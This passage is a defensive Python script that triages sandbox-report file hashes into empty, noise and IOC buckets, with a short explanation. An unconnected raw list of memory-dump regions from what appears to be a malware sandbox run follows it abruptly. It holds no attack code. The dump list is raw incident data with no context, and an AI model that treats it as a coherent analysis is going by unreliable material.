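SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
"""

ALGOS = ("MD5", "SHA1", "SHA256", "SHA512")
HEX_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
LABELLED_HASH = re.compile(r"^(MD5|SHA1|SHA256|SHA512)([0-9a-fA-F]+)$")
# Digests of zero bytes: an entry carrying these (the Crashpad pipe) has no content to pivot on.
EMPTY_DIGEST = {a: hashlib.new(a.lower(), b"").hexdigest() for a in ALGOS}

# Assumed noise list: artifacts a PowerShell run and an Edge launch leave on any
# Windows 10 host; evidence that those processes ran, not attacker-controlled content.
NOISE_PATHS = (
    re.compile(r"\\Microsoft\\Edge\\User Data\\", re.I),
    re.compile(r"\\CLR_v4\.0\\UsageLogs\\", re.I),
    re.compile(r"\\PowerShell\\StartupProfileData-", re.I),
    re.compile(r"\\__PSScriptPolicyTest_[^\\]+\.ps1$", re.I),  # PowerShell's AppLocker/WDAC policy probe
)


def parse_report(text):
    """Turn the flattened export into dicts: {'path', 'size', 'hashes': {algo: hex}}."""
    records, cur, pending = [], None, None
    for line in (raw.strip() for raw in text.splitlines()):
        if not line:
            continue
        if line == "-":  # entry separator
            if cur:
                records.append(cur)
            cur = None
            continue
        if cur is None:  # first line of an entry: the path with the next label fused on
            cur = {"path": line, "size": None, "hashes": {}}
            if line.endswith("Filesize"):
                cur["path"], pending = line[: -len("Filesize")], "size"
            elif line.endswith("MD5"):  # pipes carry no size, so the MD5 label is fused instead
                cur["path"], pending = line[:-3], "MD5"
            continue
        if pending == "size":
            cur["size"], pending = line, None
        elif pending == "MD5":
            cur["hashes"]["MD5"], pending = line.lower(), None
        else:
            m = LABELLED_HASH.match(line)
            if m:
                cur["hashes"][m.group(1)] = m.group(2).lower()
    if cur:
        records.append(cur)
    return records


def hashes_well_formed(rec):
    """Every digest present has its algorithm's length (catches truncated copy-paste)."""
    return all(len(h) == HEX_LEN[a] for a, h in rec["hashes"].items())


def size_to_bytes(size):
    m = re.fullmatch(r"([\d.]+)(B|KB|MB)", size)
    return int(float(m.group(1)) * {"B": 1, "KB": 1024, "MB": 1024 ** 2}[m.group(2)])


def classify(rec):
    if any(h == EMPTY_DIGEST[a] for a, h in rec["hashes"].items()):
        return "empty"
    if any(p.search(rec["path"]) for p in NOISE_PATHS):
        return "noise"
    return "ioc"


def triage(records):
    """Return (path, sha256) for the entries worth hunting for, in report order."""
    return [(r["path"], r["hashes"].get("SHA256")) for r in records if classify(r) == "ioc"]


if __name__ == "__main__":
    for rec in parse_report(SAMPLE_REPORT):
        print(f"{classify(rec):5s} {rec['path']}")
```

Run on the four sample entries, the only record left in the "ioc" bucket is the 51KB executable written to Temp, which is the one to pull from the sandbox for further analysis; the Edge profile files and the PowerShell policy probe are classified as noise, and the named pipe is dropped because its digests are those of empty input. Hash-length checking matters because these lists are routinely copied into blocklists by hand, and a SHA256 missing a character never matches anything.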
memory/3376-138-0x00000230B7590000-0x00000230B75B2000-memory.dmp
Filesize 136KB
-
memory/3900-14-0x00000236398F0000-0x00000236398F9000-memory.dmp
Filesize 36KB
-
memory/3900-11-0x00000236398F0000-0x00000236398F9000-memory.dmp
Filesize 36KB
-
memory/3900-12-0x0000023639910000-0x0000023639911000-memory.dmp
Filesize 4KB
-
memory/4260-30-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-63-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-0-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmp
Filesize 13.0MB
-
memory/4260-31-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-32-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-33-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-34-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-35-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-36-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-37-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-38-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-39-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-40-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-41-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-42-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-43-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-44-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-45-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-46-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-47-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-48-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-49-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-50-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-52-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-51-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-53-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-54-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-55-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-56-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-57-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-58-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-59-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-60-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-61-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-62-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-29-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-64-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-65-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-67-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-66-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-28-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-26-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmp
Filesize 13.0MB
-
memory/4260-27-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-25-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-24-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-97-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmp
Filesize 13.0MB
-
memory/4260-23-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-22-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-21-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-208-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-20-0x00007FFB38C10000-0x00007FFB38C11000-memory.dmp
Filesize 4KB
-
memory/4260-9-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-7-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmp
Filesize 13.0MB
-
memory/4260-5-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmp
Filesize 13.0MB
-
memory/4260-238-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-6-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmp
Filesize 13.0MB
-
memory/4260-253-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-252-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmp
Filesize 13.0MB
-
memory/4260-3-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmp
Filesize 13.0MB
-
memory/4260-2-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmp
Filesize 13.0MB
-
memory/4260-4-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmp
Filesize 13.0MB
-
memory/4260-1-0x00007FFB38C10000-0x00007FFB38C12000-memory.dmp
Filesize 8KB
-
memory/4260-368-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-369-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-371-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-370-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmp
Filesize 13.0MB
-
memory/4260-372-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-374-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmp
Filesize 2.0MB
-
memory/4260-373-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmp
Filesize 13.0MB